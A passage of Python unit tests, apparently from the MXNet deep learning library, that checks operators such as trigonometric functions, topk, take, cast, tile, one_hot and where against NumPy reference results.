data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/12901")
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp < 0.6, [1], [0]) * np.where(data_tmp > -0.6, [1], [0])])
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out.asnumpy())
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0].asnumpy(), a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())
for mode in ['clip', 'wrap']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r.asnumpy(), data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0].asnumpy(), X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0].asnumpy(), X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
def get_data():
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
input_np = np.array(list(get_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
x = mx.sym.Variable('x', dtype=np.float32)
sym = mx.sym.Cast(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x' : mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats).asnumpy()
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis).asnumpy()
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
